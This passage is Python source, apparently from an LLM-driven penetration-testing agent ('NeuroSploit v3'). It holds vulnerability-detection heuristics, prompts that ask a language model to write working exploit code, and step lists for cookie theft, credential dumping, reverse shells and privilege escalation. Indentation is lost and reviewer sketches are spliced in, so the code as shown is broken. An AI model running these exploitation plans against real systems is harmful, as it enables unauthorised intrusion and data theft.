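    return (injected_seconds - baseline) >= (sleep_seconds - tolerance)


DELAYED = looks_time_based([0.2, 0.3, 0.25], injected_seconds=3.4, sleep_seconds=3.0)
JUST_SLOW = looks_time_based([2.8, 3.0, 2.9], injected_seconds=3.1, sleep_seconds=3.0)
```

# A server that is slow for every request (the second case) is not flagged,
# because the extra delay over the baseline is far below the injected sleep.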
def _quick_vuln_check(self, vuln_type: str, payload: str, body: str, status: int, headers: Dict) -> Dict:
"""Quick vulnerability check without LLM"""
result = {"possible": False, "high_confidence": False, "evidence": ""}
body_lower = body.lower()
if vuln_type == "xss":
# Check for exact payload reflection (unencoded)
if payload in body and "<" in payload:
result["possible"] = True
result["evidence"] = "XSS payload reflected without encoding"
# High confidence only if a <script> payload is reflected verbatim
if "<script>" in payload.lower() and payload.lower() in body_lower:
result["high_confidence"] = True
elif vuln_type == "sqli":
sql_errors = [
"sql syntax", "mysql_", "sqlite_", "pg_query", "ora-",
"unterminated", "query failed", "database error",
"you have an error in your sql", "warning: mysql",
]
for error in sql_errors:
if error in body_lower:
result["possible"] = True
result["high_confidence"] = True
result["evidence"] = f"SQL error: {error}"
break
elif vuln_type == "lfi":
lfi_indicators = ["root:x:", "root:*:", "[boot loader]", "daemon:", "/bin/bash"]
for indicator in lfi_indicators:
if indicator.lower() in body_lower:
result["possible"] = True
result["high_confidence"] = True
result["evidence"] = f"File content: {indicator}"
break
elif vuln_type == "ssti":
if "49" in body and "7*7" in payload:
result["possible"] = True
result["high_confidence"] = True
result["evidence"] = "SSTI: 7*7=49 evaluated"
elif vuln_type == "rce":
rce_indicators = ["uid=", "gid=", "groups=", "/bin/", "/usr/"]
for indicator in rce_indicators:
if indicator in body_lower:
result["possible"] = True
result["high_confidence"] = True
result["evidence"] = f"Command output: {indicator}"
break
elif vuln_type == "ssrf":
ssrf_indicators = ["root:", "localhost", "internal", "meta-data", "169.254"]
for indicator in ssrf_indicators:
if indicator in body_lower:
result["possible"] = True
result["evidence"] = f"Internal content: {indicator}"
break
return result
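# Illustrative sketch (not part of the original module): the SSTI check above
# looks for "49" anywhere in the body, which also matches prices, IDs and
# dates. A possible alternative, shown here as an assumption rather than the
# author's method, is to multiply two larger operands so the product is
# unlikely to appear by chance. ssti_probe and ssti_evaluated are hypothetical.

```python
def ssti_probe(a=1337, b=7331):
    """Build template payloads for a*b and the product expected when evaluated."""
    expected = str(a * b)
    payloads = [
        f"{{{{{a}*{b}}}}}",   # Jinja2/Twig style: {{a*b}}
        f"${{{a}*{b}}}",      # expression-language style: ${a*b}
        f"<%= {a}*{b} %>",    # ERB style: <%= a*b %>
    ]
    return payloads, expected


def ssti_evaluated(body, expected):
    """Return True if the evaluated product appears in the response body."""
    return expected in body


PAYLOADS, EXPECTED = ssti_probe()
EVALUATED = ssti_evaluated(f"Hello {EXPECTED}", EXPECTED)
REFLECTED_ONLY = ssti_evaluated(f"You searched for {PAYLOADS[0]}", EXPECTED)
```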
async def _llm_confirm_vulnerability(
self, vuln_type: str, payload: str, body: str, status: int, headers: Dict, endpoint: str
) -> Dict:
"""Use LLM to confirm if a vulnerability is real"""
prompt = f"""Analyze this HTTP response to determine if there is a REAL {vuln_type.upper()} vulnerability.
IMPORTANT: Only confirm if you are CERTAIN. Avoid false positives.
Endpoint: {endpoint}
Payload sent: {payload}
HTTP Status: {status}
Response headers: {json.dumps(dict(list(headers.items())[:10]))}
Response body (truncated): {body[:2000]}
Analyze and respond with JSON:
{{
"confirmed": true/false,
"confidence": "high"/"medium"/"low",
"evidence": "specific evidence from response",
"exploitable": true/false,
"analysis": "brief explanation"
}}
CRITICAL RULES:
1. For XSS: Payload must be reflected WITHOUT encoding in a context where it executes
2. For SQLi: Must see actual SQL error messages, not just reflected input
3. For LFI: Must see actual file contents (like /etc/passwd)
4. For SSTI: Math expressions must be EVALUATED (49 for 7*7)
5. For RCE: Must see command output (uid=, /bin/, etc.)
If uncertain, set confirmed=false. Better to miss a vuln than report false positive."""
try:
response = self.llm_manager.generate(
prompt,
"You are a security expert. Analyze HTTP responses to confirm vulnerabilities. Be precise and avoid false positives."
)
# Parse JSON response
match = re.search(r'\{.*?\}', response, re.DOTALL)
if match:
result = json.loads(match.group())
return result
except Exception as e:
await self.log("debug", f"LLM confirmation error: {e}")
return {"confirmed": False}
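# Illustrative sketch (not part of the original module): the non-greedy pattern
# r'\{.*?\}' stops at the first closing brace, so it breaks on nested objects
# or on a "}" inside a string value. A possible alternative is to let the JSON
# decoder find the end of the object. first_json_object is a hypothetical name.

```python
import json


def first_json_object(text):
    """Return the first JSON object embedded in `text`, or None if there is none."""
    decoder = json.JSONDecoder()
    start = text.find("{")
    while start != -1:
        try:
            value, _end = decoder.raw_decode(text, start)
        except json.JSONDecodeError:
            value = None
        if isinstance(value, dict):
            return value
        # Not valid JSON from this brace, so try the next one
        start = text.find("{", start + 1)
    return None


REPLY = 'Analysis: {"confirmed": true, "evidence": "saw } in body", "meta": {"k": 1}} done'
PARSED = first_json_object(REPLY)
MISSING = first_json_object("no structured answer")
```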
def _get_severity(self, vuln_type: str) -> str:
"""Get severity based on vulnerability type"""
severity_map = {
"rce": "critical",
"sqli": "critical",
"ssti": "critical",
"lfi": "high",
"ssrf": "high",
"xss": "high",
"xxe": "high",
"idor": "medium",
"open_redirect": "medium",
}
return severity_map.get(vuln_type, "medium")
def _get_impact(self, vuln_type: str) -> str:
"""Get impact description"""
impact_map = {
"rce": "Remote Code Execution - Full server compromise",
"sqli": "SQL Injection - Database compromise, data theft",
"ssti": "Server-Side Template Injection - RCE possible",
"lfi": "Local File Inclusion - Sensitive data exposure",
"ssrf": "Server-Side Request Forgery - Internal network access",
"xss": "Cross-Site Scripting - Session hijacking",
"xxe": "XML External Entity - Data theft, SSRF",
"idor": "Insecure Direct Object Reference - Data access",
"open_redirect": "Open Redirect - Phishing attacks",
}
return impact_map.get(vuln_type, "Security vulnerability")
async def _exploitation_phase(self):
"""Generate PoC code for confirmed vulnerabilities"""
await self.log("info", f" Generating PoC for {len(self.state.findings)} confirmed vulnerabilities...")
for finding in self.state.findings:
if finding.exploitable:
poc = await self._generate_poc(finding)
finding.poc_code = poc
finding.exploitation_steps = self._get_exploitation_steps(finding)
await self.log("info", f" PoC generated for {finding.vuln_type}")
async def _generate_poc(self, finding: Finding) -> str:
"""Generate PoC code using LLM if available"""
if self.llm_manager:
try:
prompt = f"""Generate a Python proof-of-concept exploit for this vulnerability:
Type: {finding.vuln_type}
Endpoint: {finding.endpoint}
Payload: {finding.payload}
Evidence: {finding.evidence}
Create a working Python script that:
1. Demonstrates the vulnerability
2. Includes proper error handling
3. Has comments explaining each step
4. Is safe to run (no destructive actions)
Return ONLY the Python code, no explanations."""
response = self.llm_manager.generate(prompt, "You are a security researcher. Generate safe, educational PoC code.")
# Extract code block
code_match = re.search(r'```python\n(.*?)```', response, re.DOTALL)
if code_match:
return code_match.group(1)
elif "import" in response:
return response
except Exception as e:
await self.log("debug", f"PoC generation error: {e}")
# Fallback to template
return self._get_poc_template(finding)
def _get_poc_template(self, finding: Finding) -> str:
"""Get PoC template for a vulnerability"""
return f'''#!/usr/bin/env python3
"""
{finding.vuln_type.upper()} Proof of Concept
Target: {finding.endpoint}
Generated by NeuroSploit AI Agent
"""
import requests
def exploit():
url = {finding.endpoint!r}
payload = {finding.payload!r}
evidence = {finding.evidence!r}
response = requests.get(url, params={{"test": payload}})
print(f"Status: {{response.status_code}}")
print(f"Vulnerable: {{evidence in response.text}}")
if __name__ == "__main__":
exploit()
'''
def _get_exploitation_steps(self, finding: Finding) -> List[str]:
"""Get exploitation steps for a vulnerability"""
steps_map = {
"xss": [
"1. Confirm XSS with alert(document.domain)",
"2. Craft cookie stealing payload",
"3. Host attacker server to receive cookies",
"4. Send malicious link to victim",
],
"sqli": [
"1. Confirm injection with error-based payloads",
"2. Enumerate database with UNION SELECT",
"3. Extract table names from information_schema",
"4. Dump sensitive data (credentials, PII)",
],
"lfi": [
"1. Confirm LFI with /etc/passwd",
"2. Read application source code",
"3. Extract credentials from config files",
"4. Attempt log poisoning for RCE",
],
"rce": [
"1. CRITICAL - Confirm command execution",
"2. Establish reverse shell",
"3. Enumerate system and network",
"4. Escalate privileges",
],
}
return steps_map.get(finding.vuln_type, ["1. Investigate further", "2. Attempt exploitation"])
async def _chaining_phase(self):
"""Analyze potential attack chains"""
await self.log("info", " Analyzing attack chain possibilities...")
vuln_types = [f.vuln_type for f in self.state.findings]
if "xss" in vuln_types:
await self.log("info", " Chain: XSS -> Session Hijacking -> Account Takeover")
if "sqli" in vuln_types:
await self.log("info", " Chain: SQLi -> Data Extraction -> Credential Theft")
if "sqli" in vuln_types and "lfi" in vuln_types:
await self.log("info", " Chain: SQLi + LFI -> Database File Read -> RCE via INTO OUTFILE")
if "ssrf" in vuln_types:
await self.log("info", " Chain: SSRF -> Cloud Metadata -> AWS Keys -> Full Compromise")
async def _generate_report(self) -> Dict[str, Any]:
"""Generate comprehensive report"""
report = {
"target": self.target,
"scan_date": datetime.utcnow().isoformat(),
"agent": "NeuroSploit AI Agent v3",
"mode": "LLM-powered intelligent testing",
"llm_enabled": self.llm_manager is not None,
"summary": {
"total_endpoints": len(self.state.discovered_endpoints),
"total_parameters": sum(len(v) for v in self.state.discovered_params.values()),
"total_vulnerabilities": len(self.state.findings),
"critical": len([f for f in self.state.findings if f.severity == "critical"]),
"high": len([f for f in self.state.findings if f.severity == "high"]),
"medium": len([f for f in self.state.findings if f.severity == "medium"]),
"low": len([f for f in self.state.findings if f.severity == "low"]),
"technologies": self.state.technologies,
},
"findings": [],
"recommendations": [],
}
for finding in self.state.findings:
report["findings"].append({
"type": finding.vuln_type,
"severity": finding.severity,
"confidence": finding.confidence,
"endpoint": finding.endpoint,
"payload": finding.payload,
"evidence": finding.evidence,
"impact": finding.impact,
"exploitable": finding.exploitable,
"exploitation_steps": finding.exploitation_steps,
"poc_code": finding.poc_code,
"llm_analysis": finding.llm_analysis,
})
# Log summary
await self.log("info", "=" * 60)
await self.log("info", "REPORT SUMMARY")
await self.log("info", "=" * 60)
await self.log("info", f"Confirmed Vulnerabilities: {len(self.state.findings)}")
await self.log("info", f" Critical: {report['summary']['critical']}")
await self.log("info", f" High: {report['summary']['high']}")
await self.log("info", f" Medium: {report['summary']['medium']}")
await self.log("info", f" Low: {report['summary']['low']}")
for finding in self.state.findings:
await self.log("warning", f" [{finding.severity.upper()}] {finding.vuln_type}: {finding.endpoint[:50]}")
return report
@@ -1,553 +0,0 @@
"""
NeuroSploit v3 - AI-Powered Prompt Processor
Uses Claude/OpenAI to intelligently analyze prompts and determine:
1. What vulnerabilities to test
2. Testing strategy and depth
3. Custom payloads based on context
4. Dynamic analysis based on recon results
"""
import os
import json
import asyncio
from typing import List, Dict, Any, Optional
from dataclasses import dataclass
@dataclass
class TestingPlan:
"""AI-generated testing plan"""
vulnerability_types: List[str]
testing_focus: List[str]
custom_payloads: List[str]
testing_depth: str
specific_endpoints: List[str]
bypass_techniques: List[str]
priority_order: List[str]
ai_reasoning: str
class AIPromptProcessor:
"""
Uses LLM (Claude/OpenAI) to process prompts and generate intelligent testing plans.
NOT limited to predefined vulnerability types - the AI decides what to test.
"""
def __init__(self):
self.anthropic_key = os.environ.get("ANTHROPIC_API_KEY", "")
self.openai_key = os.environ.get("OPENAI_API_KEY", "")
async def process_prompt(
self,
prompt: str,
recon_data: Optional[Dict] = None,
target_info: Optional[Dict] = None
) -> TestingPlan:
"""
Process a user prompt with AI to generate a testing plan.
Args:
prompt: User's testing prompt/instructions
recon_data: Results from reconnaissance phase
target_info: Information about the target
Returns:
TestingPlan with AI-determined testing strategy
"""
# Build context for the AI
context = self._build_context(prompt, recon_data, target_info)
# Try Claude first, then OpenAI
if self.anthropic_key:
return await self._process_with_claude(context)
elif self.openai_key:
return await self._process_with_openai(context)
else:
# Fallback to intelligent defaults based on prompt analysis
return await self._intelligent_fallback(prompt, recon_data)
def _build_context(
self,
prompt: str,
recon_data: Optional[Dict],
target_info: Optional[Dict]
) -> str:
"""Build comprehensive context for the AI"""
context_parts = [
"You are an expert penetration tester analyzing a target.",
f"\n## User's Testing Request:\n{prompt}",
]
if target_info:
context_parts.append(f"\n## Target Information:\n{json.dumps(target_info, indent=2)}")
if recon_data:
# Summarize recon data
summary = {
"subdomains_count": len(recon_data.get("subdomains", [])),
"live_hosts": recon_data.get("live_hosts", [])[:10],
"endpoints_count": len(recon_data.get("endpoints", [])),
"sample_endpoints": [e.get("url", e) if isinstance(e, dict) else e for e in recon_data.get("endpoints", [])[:20]],
"urls_with_params": [u for u in recon_data.get("urls", []) if "?" in str(u)][:10],
"open_ports": recon_data.get("ports", [])[:20],
"technologies": recon_data.get("technologies", []),
"interesting_paths": recon_data.get("interesting_paths", []),
"js_files": recon_data.get("js_files", [])[:10],
"nuclei_findings": recon_data.get("vulnerabilities", [])
}
context_parts.append(f"\n## Reconnaissance Results:\n{json.dumps(summary, indent=2)}")
context_parts.append("""
## Your Task:
Based on the user's request and the reconnaissance data, create a comprehensive testing plan.
You are NOT limited to specific vulnerability types - analyze the context and determine what to test.
Consider:
1. What the user specifically asked for
2. What the recon data reveals (technologies, endpoints, parameters)
3. Common vulnerabilities for the detected tech stack
4. Any interesting findings that warrant deeper testing
5. OWASP Top 10 and beyond based on context
Respond with a JSON object containing:
{
"vulnerability_types": ["list of specific vulnerability types to test"],
"testing_focus": ["specific areas to focus on based on findings"],
"custom_payloads": ["any custom payloads based on detected technologies"],
"testing_depth": "quick|medium|thorough",
"specific_endpoints": ["high-priority endpoints to test first"],
"bypass_techniques": ["WAF/filter bypass techniques if applicable"],
"priority_order": ["ordered list of what to test first"],
"ai_reasoning": "brief explanation of why you chose this testing strategy"
}
""")
return "\n".join(context_parts)
async def _process_with_claude(self, context: str) -> TestingPlan:
"""Process with Claude API"""
try:
import httpx
async with httpx.AsyncClient(timeout=60.0) as client:
response = await client.post(
"https://api.anthropic.com/v1/messages",
headers={
"x-api-key": self.anthropic_key,
"anthropic-version": "2023-06-01",
"content-type": "application/json"
},
json={
"model": "claude-sonnet-4-20250514",
"max_tokens": 4096,
"messages": [
{"role": "user", "content": context}
]
}
)
if response.status_code == 200:
data = response.json()
content = data.get("content", [{}])[0].get("text", "{}")
# Extract JSON from response
return self._parse_ai_response(content)
else:
print(f"Claude API error: {response.status_code}")
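# NOTE: `context` is the full LLM prompt (instructions included), not the user's original prompt,
# so the keyword matching in the fallback also sees words such as "OWASP" from the template.
return await self._intelligent_fallback(context, None)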
except Exception as e:
print(f"Claude processing error: {e}")
return await self._intelligent_fallback(context, None)
async def _process_with_openai(self, context: str) -> TestingPlan:
"""Process with OpenAI API"""
try:
import httpx
async with httpx.AsyncClient(timeout=60.0) as client:
response = await client.post(
"https://api.openai.com/v1/chat/completions",
headers={
"Authorization": f"Bearer {self.openai_key}",
"Content-Type": "application/json"
},
json={
"model": "gpt-4o",
"messages": [
{"role": "system", "content": "You are an expert penetration tester. Respond only with valid JSON."},
{"role": "user", "content": context}
],
"max_tokens": 4096,
"temperature": 0.3
}
)
if response.status_code == 200:
data = response.json()
content = data.get("choices", [{}])[0].get("message", {}).get("content", "{}")
return self._parse_ai_response(content)
else:
print(f"OpenAI API error: {response.status_code}")
return await self._intelligent_fallback(context, None)
except Exception as e:
print(f"OpenAI processing error: {e}")
return await self._intelligent_fallback(context, None)
def _parse_ai_response(self, content: str) -> TestingPlan:
"""Parse AI response into TestingPlan"""
try:
# Try to extract JSON from the response
import re
json_match = re.search(r'\{[\s\S]*\}', content)
if json_match:
data = json.loads(json_match.group())
return TestingPlan(
vulnerability_types=data.get("vulnerability_types", []),
testing_focus=data.get("testing_focus", []),
custom_payloads=data.get("custom_payloads", []),
testing_depth=data.get("testing_depth", "medium"),
specific_endpoints=data.get("specific_endpoints", []),
bypass_techniques=data.get("bypass_techniques", []),
priority_order=data.get("priority_order", []),
ai_reasoning=data.get("ai_reasoning", "AI-generated testing plan")
)
except Exception as e:
print(f"Failed to parse AI response: {e}")
return self._default_plan()
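# The greedy pattern r'\{[\s\S]*\}' used above spans from the first "{" to the
# last "}" in the reply, so any brace in trailing commentary makes json.loads
# fail and the default plan is returned. A minimal sketch of an alternative,
# using the standard library's json.JSONDecoder.raw_decode to read exactly one
# object starting at each "{". The function name extract_first_json_object and
# the sample reply are hypothetical.

```python
import json
from typing import Any, Dict, Optional


def extract_first_json_object(text: str) -> Optional[Dict[str, Any]]:
    """Return the first decodable JSON object embedded in text, or None."""
    decoder = json.JSONDecoder()
    start = text.find("{")
    while start != -1:
        try:
            # raw_decode parses one JSON value beginning at `start` and
            # ignores whatever follows it.
            obj, _end = decoder.raw_decode(text, start)
        except json.JSONDecodeError:
            obj = None
        if isinstance(obj, dict):
            return obj
        start = text.find("{", start + 1)
    return None


reply = (
    "Plan below:\n"
    '{"testing_depth": "quick", "vulnerability_types": ["xss_reflected"]}\n'
    "Note: {not json}"
)
plan = extract_first_json_object(reply)
```

# With this reply the greedy regex would capture through "{not json}" and fail
# to parse, while the decoder-based scan stops at the end of the first object.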
async def _intelligent_fallback(self, prompt: str, recon_data: Optional[Dict]) -> TestingPlan:
"""
Keyword-based fallback used when no API key is configured or an API call fails.
Builds a testing plan from keywords in the prompt and from the recon data.
"""
prompt_lower = prompt.lower()
vuln_types = []
focus = []
priority = []
# Analyze prompt for specific requests
if any(word in prompt_lower for word in ["xss", "cross-site", "script"]):
vuln_types.extend(["xss_reflected", "xss_stored", "xss_dom"])
priority.append("XSS Testing")
if any(word in prompt_lower for word in ["sql", "injection", "database", "sqli"]):
vuln_types.extend(["sqli_error", "sqli_blind", "sqli_time", "sqli_union"])
priority.append("SQL Injection")
if any(word in prompt_lower for word in ["command", "rce", "exec", "shell"]):
vuln_types.extend(["command_injection", "rce", "os_injection"])
priority.append("Command Injection")
if any(word in prompt_lower for word in ["file", "lfi", "rfi", "path", "traversal", "include"]):
vuln_types.extend(["lfi", "rfi", "path_traversal"])
priority.append("File Inclusion")
if any(word in prompt_lower for word in ["ssrf", "request forgery", "server-side"]):
vuln_types.extend(["ssrf", "ssrf_cloud"])
priority.append("SSRF")
if any(word in prompt_lower for word in ["auth", "login", "password", "session", "jwt", "token"]):
vuln_types.extend(["auth_bypass", "session_fixation", "jwt_manipulation", "brute_force"])
priority.append("Authentication Testing")
if any(word in prompt_lower for word in ["idor", "authorization", "access control", "privilege"]):
vuln_types.extend(["idor", "bola", "privilege_escalation"])
priority.append("Authorization Testing")
if any(word in prompt_lower for word in ["api", "rest", "graphql", "endpoint"]):
vuln_types.extend(["api_abuse", "mass_assignment", "rate_limiting", "graphql_introspection"])
priority.append("API Security")
if any(word in prompt_lower for word in ["cors", "header", "security header"]):
vuln_types.extend(["cors_misconfiguration", "missing_security_headers"])
priority.append("Headers & CORS")
if any(word in prompt_lower for word in ["upload", "file upload"]):
vuln_types.extend(["file_upload", "unrestricted_upload"])
priority.append("File Upload Testing")
if any(word in prompt_lower for word in ["redirect", "open redirect"]):
vuln_types.extend(["open_redirect"])
priority.append("Open Redirect")
if any(word in prompt_lower for word in ["ssti", "template"]):
vuln_types.extend(["ssti"])
priority.append("SSTI")
if any(word in prompt_lower for word in ["xxe", "xml"]):
vuln_types.extend(["xxe"])
priority.append("XXE")
if any(word in prompt_lower for word in ["deserialization", "serialize"]):
vuln_types.extend(["insecure_deserialization"])
priority.append("Deserialization")
# If prompt mentions comprehensive/full/all/everything
if any(word in prompt_lower for word in ["comprehensive", "full", "all", "everything", "complete", "pentest", "assessment"]):
vuln_types = list(set(vuln_types + [
"xss_reflected", "xss_stored", "sqli_error", "sqli_blind",
"command_injection", "lfi", "path_traversal", "ssrf",
"auth_bypass", "idor", "cors_misconfiguration", "open_redirect",
"ssti", "file_upload", "xxe", "missing_security_headers"
]))
focus.append("Comprehensive security assessment")
# OWASP Top 10 focus
if "owasp" in prompt_lower:
vuln_types = list(set(vuln_types + [
"sqli_error", "xss_reflected", "auth_bypass", "idor",
"security_misconfiguration", "sensitive_data_exposure",
"xxe", "insecure_deserialization", "missing_security_headers",
"ssrf"
]))
focus.append("OWASP Top 10 Coverage")
# Bug bounty focus
if any(word in prompt_lower for word in ["bounty", "bug bounty", "high impact"]):
vuln_types = list(set(vuln_types + [
"sqli_error", "xss_stored", "rce", "ssrf", "idor",
"auth_bypass", "privilege_escalation"
]))
focus.append("High-impact vulnerabilities for bug bounty")
# Analyze recon data if available
if recon_data:
endpoints = recon_data.get("endpoints", [])
urls = recon_data.get("urls", [])
techs = recon_data.get("technologies", [])
# Check for parameters (injection points)
param_urls = [u for u in urls if "?" in str(u)]
if param_urls:
focus.append(f"Found {len(param_urls)} URLs with parameters - test for injection")
if "sqli_error" not in vuln_types:
vuln_types.append("sqli_error")
if "xss_reflected" not in vuln_types:
vuln_types.append("xss_reflected")
# Check for interesting paths
interesting = recon_data.get("interesting_paths", [])
if interesting:
focus.append(f"Found {len(interesting)} interesting paths to investigate")
# Check for JS files (DOM XSS potential)
js_files = recon_data.get("js_files", [])
if js_files:
focus.append(f"Found {len(js_files)} JS files - check for DOM XSS and secrets")
if "xss_dom" not in vuln_types:
vuln_types.append("xss_dom")
# Technology-specific testing
tech_str = str(techs).lower()
if "php" in tech_str:
vuln_types = list(set(vuln_types + ["lfi", "rfi", "file_upload"]))
if "wordpress" in tech_str:
focus.append("WordPress detected - test for WP-specific vulns")
if "java" in tech_str or "spring" in tech_str:
vuln_types = list(set(vuln_types + ["ssti", "insecure_deserialization"]))
if "node" in tech_str or "express" in tech_str:
vuln_types = list(set(vuln_types + ["prototype_pollution", "ssti"]))
if "api" in tech_str or "json" in tech_str:
vuln_types = list(set(vuln_types + ["api_abuse", "mass_assignment"]))
# Default if nothing specific found
if not vuln_types:
vuln_types = [
"xss_reflected", "sqli_error", "lfi", "open_redirect",
"cors_misconfiguration", "missing_security_headers"
]
focus.append("General security assessment")
return TestingPlan(
vulnerability_types=vuln_types,
testing_focus=focus if focus else ["General vulnerability testing"],
custom_payloads=[],
testing_depth="medium",
specific_endpoints=[],
bypass_techniques=[],
priority_order=priority if priority else vuln_types[:5],
ai_reasoning="Intelligent fallback analysis based on prompt keywords and recon data"
)
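# The keyword checks in _intelligent_fallback use plain substring tests, so
# "all" also matches "install" and "file" also matches "profile". A minimal
# sketch of whole-word matching with a regular expression; the helper name
# mentions_any is hypothetical and not part of the original class.

```python
import re
from typing import Iterable


def mentions_any(text: str, keywords: Iterable[str]) -> bool:
    """True if any keyword occurs in text as a whole word or phrase."""
    escaped = [re.escape(k) for k in keywords]
    if not escaped:
        return False
    # \b anchors keep short keywords from matching inside longer words.
    pattern = r"\b(?:" + "|".join(escaped) + r")\b"
    return re.search(pattern, text, re.IGNORECASE) is not None


mentions_any("install the profile page", ["all", "file"])   # False
mentions_any("Run a FULL pentest", ["full", "all"])         # True
mentions_any("test cross-site scripting", ["cross-site"])   # True
```

# The trade-off is that stems no longer match inflected forms ("script" will
# not match "scripting"), so such variants would need to be listed explicitly.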
def _default_plan(self) -> TestingPlan:
"""Default testing plan"""
return TestingPlan(
vulnerability_types=[
"xss_reflected", "sqli_error", "sqli_blind", "command_injection",
"lfi", "path_traversal", "ssrf", "auth_bypass", "idor",
"cors_misconfiguration", "open_redirect", "missing_security_headers"
],
testing_focus=["Comprehensive vulnerability assessment"],
custom_payloads=[],
testing_depth="medium",
specific_endpoints=[],
bypass_techniques=[],
priority_order=["SQL Injection", "XSS", "Command Injection", "Authentication"],
ai_reasoning="Default comprehensive testing plan"
)
class AIVulnerabilityAnalyzer:
"""
Uses AI to analyze potential vulnerabilities found during testing.
Provides intelligent confirmation and exploitation guidance.
"""
def __init__(self):
self.anthropic_key = os.environ.get("ANTHROPIC_API_KEY", "")
self.openai_key = os.environ.get("OPENAI_API_KEY", "")
async def analyze_finding(
self,
vuln_type: str,
request: Dict,
response: Dict,
payload: str,
context: Optional[Dict] = None
) -> Dict[str, Any]:
"""
Use AI to analyze a potential vulnerability finding.
Returns confidence level, exploitation advice, and remediation.
"""
if not self.anthropic_key and not self.openai_key:
return self._basic_analysis(vuln_type, request, response, payload)
prompt = f"""
Analyze this potential security vulnerability:
**Vulnerability Type**: {vuln_type}
**Payload Used**: {payload}
**Request**: {json.dumps(request, indent=2)[:1000]}
**Response Status**: {response.get('status')}
**Response Body Preview**: {response.get('body_preview', '')[:500]}
Analyze and respond with JSON:
{{
"is_vulnerable": true/false,
"confidence": 0.0-1.0,
"evidence": "specific evidence from response",
"severity": "critical/high/medium/low/info",
"exploitation_path": "how to exploit if vulnerable",
"remediation": "how to fix",
"false_positive_indicators": ["reasons this might be false positive"]
}}
"""
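try:
if self.anthropic_key:
result = await self._analyze_with_claude(prompt)
else:
result = await self._analyze_with_openai(prompt)
# An empty dict means the API call failed or returned no JSON; use the basic analysis instead
if result:
return result
except Exception as e:
print(f"AI analysis error: {e}")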
return self._basic_analysis(vuln_type, request, response, payload)
async def _analyze_with_claude(self, prompt: str) -> Dict:
"""Analyze with Claude"""
import httpx
async with httpx.AsyncClient(timeout=30.0) as client:
response = await client.post(
"https://api.anthropic.com/v1/messages",
headers={
"x-api-key": self.anthropic_key,
"anthropic-version": "2023-06-01",
"content-type": "application/json"
},
json={
"model": "claude-sonnet-4-20250514",
"max_tokens": 1024,
"messages": [{"role": "user", "content": prompt}]
}
)
if response.status_code == 200:
data = response.json()
content = data.get("content", [{}])[0].get("text", "{}")
import re
json_match = re.search(r'\{[\s\S]*\}', content)
if json_match:
return json.loads(json_match.group())
return {}
async def _analyze_with_openai(self, prompt: str) -> Dict:
"""Analyze with OpenAI"""
import httpx
async with httpx.AsyncClient(timeout=30.0) as client:
response = await client.post(
"https://api.openai.com/v1/chat/completions",
headers={
"Authorization": f"Bearer {self.openai_key}",
"Content-Type": "application/json"
},
json={
"model": "gpt-4o",
"messages": [
{"role": "system", "content": "You are a security expert. Respond only with valid JSON."},
{"role": "user", "content": prompt}
],
"max_tokens": 1024
}
)
if response.status_code == 200:
data = response.json()
content = data.get("choices", [{}])[0].get("message", {}).get("content", "{}")
import re
json_match = re.search(r'\{[\s\S]*\}', content)
if json_match:
return json.loads(json_match.group())
return {}
def _basic_analysis(self, vuln_type: str, request: Dict, response: Dict, payload: str) -> Dict:
"""Basic analysis without AI"""
body = response.get("body_preview", "").lower()
status = response.get("status", 0)
is_vulnerable = False
confidence = 0.0
evidence = ""
# Basic detection patterns
if vuln_type in ["xss_reflected", "xss_stored"]:
if payload.lower() in body:
is_vulnerable = True
confidence = 0.7
evidence = "Payload reflected in response"
elif vuln_type in ["sqli_error", "sqli_blind"]:
error_patterns = ["sql", "mysql", "syntax", "query", "oracle", "postgresql", "sqlite"]
if any(p in body for p in error_patterns):
is_vulnerable = True
confidence = 0.8
evidence = "SQL error message detected"
elif vuln_type == "lfi":
if "root:" in body or "[extensions]" in body:
is_vulnerable = True
confidence = 0.9
evidence = "File content detected in response"
elif vuln_type == "open_redirect":
if status in [301, 302, 303, 307, 308]:
is_vulnerable = True
confidence = 0.6
evidence = "Redirect detected"
return {
"is_vulnerable": is_vulnerable,
"confidence": confidence,
"evidence": evidence,
"severity": "medium",
"exploitation_path": "",
"remediation": "",
"false_positive_indicators": []
}
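# In _basic_analysis the open_redirect branch flags any 3xx status, including
# ordinary same-site redirects. A minimal sketch of a stricter check that also
# looks at where the redirect points, assuming the caller can supply the
# Location header and the request URL (neither is passed to _basic_analysis in
# the original). The function name redirects_off_site is hypothetical.

```python
from urllib.parse import urljoin, urlparse

REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def redirects_off_site(status: int, location: str, request_url: str) -> bool:
    """True if the response redirects to a host other than the requested one."""
    if status not in REDIRECT_STATUSES or not location:
        return False
    # Resolve relative and scheme-relative ("//host/path") Location values.
    target = urlparse(urljoin(request_url, location))
    origin = urlparse(request_url)
    return bool(target.netloc) and target.netloc.lower() != origin.netloc.lower()


base = "http://shop.example/go?url=x"
redirects_off_site(302, "/home", base)                    # same host
redirects_off_site(302, "https://evil.example/", base)    # different host
redirects_off_site(302, "//evil.example/path", base)      # scheme-relative, different host
```

# Comparing hosts still does not prove the destination is attacker-controlled;
# matching it against the injected payload would be the next refinement.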
@@ -1,596 +0,0 @@
"""
NeuroSploit v3 - Authentication Manager
Autonomous login, session management, multi-user context for
BOLA/BFLA/IDOR testing. Handles login form detection, CSRF extraction,
credential management, and session refresh.
"""
import logging
import re
import time
from dataclasses import dataclass, field
from datetime import datetime
from typing import Callable, Dict, List, Optional, Any
from urllib.parse import urlparse, urljoin
logger = logging.getLogger(__name__)
@dataclass
class Credentials:
"""A set of credentials for testing."""
username: str
password: str
role: str = "user" # user, admin
source: str = "provided" # provided, discovered, default
@dataclass
class SessionContext:
"""Authentication session state."""
name: str # "user_a", "user_b", "admin"
role: str # user, admin
cookies: Dict[str, str] = field(default_factory=dict)
tokens: Dict[str, str] = field(default_factory=dict) # bearer, jwt, api_key
headers: Dict[str, str] = field(default_factory=dict) # Authorization: Bearer xxx
state: str = "unauthenticated" # unauthenticated, authenticating, authenticated, expired
login_time: Optional[float] = None
credential: Optional[Credentials] = None
login_url: Optional[str] = None
session_duration: float = 3600.0 # Estimated session lifetime (1 hour default)
@dataclass
class LoginForm:
"""Detected login form."""
url: str # Form action URL
method: str # POST usually
username_field: str # name attribute of username input
password_field: str # name attribute of password input
csrf_field: Optional[str] = None
csrf_value: Optional[str] = None
extra_fields: Dict[str, str] = field(default_factory=dict)
confidence: float = 0.0
class AuthManager:
"""Autonomous authentication manager.
Manages login automation, session tracking, and multi-user
contexts for access control vulnerability testing.
Features:
- Login form detection from HTML
- CSRF token extraction
- Credential management (provided + discovered)
- Session state machine (unauthenticated -> authenticated -> expired)
- Multi-user contexts for BOLA/BFLA/IDOR testing
